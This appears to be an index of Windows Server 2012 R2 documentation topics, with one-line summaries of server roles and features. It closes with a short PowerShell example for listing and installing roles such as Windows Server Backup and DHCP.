  • What's New in Windows Server 2012 R2 Essentials
    This topic describes what's new and changed in Windows Server 2012 R2 Essentials. 
  • Active Directory Certificate Services Overview
    This content provides an overview of Active Directory Certificate Services (AD CS) in Windows Server 2012. AD CS is the server role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.
  • Active Directory Domain Services Overview
    By using the Active Directory Domain Services (AD DS) server role, you can create a scalable, secure, and manageable infrastructure for user and resource management, and provide support for directory-enabled applications such as Microsoft Exchange Server.
  • Active Directory Federation Services Overview
    This topic provides an overview of Active Directory Federation Services (AD FS) in Windows Server 2012.
  • Active Directory Lightweight Directory Services Overview
    Active Directory Lightweight Directory Services (AD LDS) is a Lightweight Directory Access Protocol (LDAP) directory service that provides flexible support for directory-enabled applications, without the dependencies and domain-related restrictions of AD DS.
  • Active Directory Rights Management Services Overview
    This document provides an overview of Active Directory Rights Management Services (AD RMS) in Windows Server 2012. AD RMS is the server role that provides you with management and development tools that work with industry security technologies—including encryption, certificates, and authentication—to help organizations create reliable information protection solutions.
  • Application Server Overview
    Application Server provides an integrated environment for deploying and running custom, server-based business applications.
  • Desktop Experience Overview
    This topic includes information about Graphical Management Tools and Infrastructure, Server Graphical Shell, Desktop Experience, and Media Foundation.
  • Failover Clustering Overview
    This topic describes the Failover Clustering feature and provides links to additional guidance about creating, configuring, and managing failover clusters on up to 4,000 virtual machines or up to 64 physical nodes.
  • File and Storage Services Overview
    This topic discusses the File and Storage Services server role in Windows Server 2012, including what’s new, a list of role services, and where to find evaluation and deployment information.
  • Group Policy Overview
    This topic describes the Group Policy feature in Windows Server 2012 and Windows 8. Use this topic to find the documentation resources and other technical information you need to accomplish key Group Policy tasks, new or updated functionality in this version compared to previous versions of Group Policy, and ways to automate common Group Policy tasks using Windows PowerShell.
  • Hyper-V Overview
    This topic describes the Hyper-V role in Windows Server 2012—practical uses for the role, the most significant new or updated functionality in this version compared to previous versions of Hyper-V, hardware requirements, and a list of operating systems (known as guest operating systems) supported for use in a Hyper-V virtual machine.
  • Networking Overview
    This section contains detailed information about networking products and features for the IT professional to design, deploy, and maintain Windows Server 2012.
  • Network Load Balancing Overview
    By managing two or more servers as a single virtual cluster, Network Load Balancing (NLB) enhances the availability and scalability of Internet server applications such as those used on web, FTP, firewall, proxy, virtual private network (VPN), and other mission-critical servers. This topic describes the NLB feature and provides links to additional guidance about creating, configuring, and managing NLB clusters.
  • Network Policy and Access Services Overview
    This topic provides an overview of Network Policy and Access Services in Windows Server 2012, including the specific role services of Network Policy Server (NPS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP). Use the Network Policy and Access Services server role to deploy and configure Network Access Protection (NAP), secure wired and wireless access points, and RADIUS servers and proxies.
  • Print and Document Services Overview
    This is an overview of Print and Document Services, including Print Server, Distributed Scan Server, and Fax Server in Windows Server 2012.
  • Remote Desktop Services Overview
    Remote Desktop Services accelerates and extends desktop and application deployments to any device, improving remote worker efficiency while helping to keep critical intellectual property secure and to simplify regulatory compliance. Remote Desktop Services enables both a virtual desktop infrastructure (VDI) and session-based desktops, allowing users to work anywhere.
  • Security and Protection
    The table on this page provides links to available information for the IT pro about security technologies and features for Windows Server 2012 and Windows 8.
  • Telemetry Overview
    Find out about Windows Feedback Forwarder—a service that enables you to automatically send feedback to Microsoft by deploying a Group Policy setting to one or more organizational units. Windows Feedback Forwarder is available on all editions of Windows Server 2012.
  • Volume Activation Overview
    This technical overview for the IT pro describes the volume activation technologies in Windows Server 2012 and how your organization can benefit from using these technologies to deploy and manage volume licenses for a medium to large number of computers.
  • Web Server (IIS) Overview
    This document introduces the Web Server (IIS) role of Windows Server 2012, describes new IIS 8 features, and links to additional Microsoft and community information about IIS.
  • Windows Deployment Services Overview
    Windows Deployment Services enables you to deploy Windows operating systems over the network, which means that you do not have to install each operating system directly from a CD or DVD.
  • Windows Server Backup Feature Overview
    This section provides an overview of the Windows Server Backup feature and lists the new features in Windows Server 2012.
  • Windows Server Essentials Experience Overview
    With the Windows Server Essentials Experience role, you can take advantage of Windows Server 2012 R2 Essentials features such as simplified management using the server dashboard, data protection, Remote Web Access, and integration with Microsoft online services—all without enforcement of the Windows Server 2012 R2 Essentials locks and limits.
  • Windows Server Update Services Overview
    Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. By using WSUS, administrators can fully manage the distribution of updates that are released through Microsoft Update to computers in their network. In Windows Server 2012, this feature is integrated with the operating system as a server role. This topic provides an overview of this server role and more information about how to deploy and maintain WSUS.
  • Windows System Resource Manager Overview
    With Windows System Resource Manager for the Windows Server 2012 operating system, you can manage server processor and memory usage with standard or custom resource policies. Managing your resources can help ensure that all the services provided by a single server are available on an equal basis or that your resources will always be available to high-priority applications, services, or users.
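Several of the topics above (Server Manager, Windows Deployment Services, Windows PowerShell) share one theme: in Windows Server 2012 R2, roles and features can be managed from PowerShell rather than the GUI. A minimal sketch using the ServerManager module's cmdlets — the server name SRV02 and the specific features installed here are placeholder examples, and the commands assume an elevated session on Windows Server 2012 or later:

```powershell
# List the roles and features currently installed on this server
Get-WindowsFeature | Where-Object { $_.Installed }

# Install the Windows Server Backup feature, including its management tools
Install-WindowsFeature -Name Windows-Server-Backup -IncludeManagementTools

# Install a role on a remote server (SRV02 is a placeholder name) —
# the same remote-management model Server Manager uses
Install-WindowsFeature -Name DHCP -ComputerName SRV02 -IncludeManagementTools
```

The `-ComputerName` parameter mirrors what the new Server Manager console does interactively: one administrative workstation driving role deployment across many remote servers.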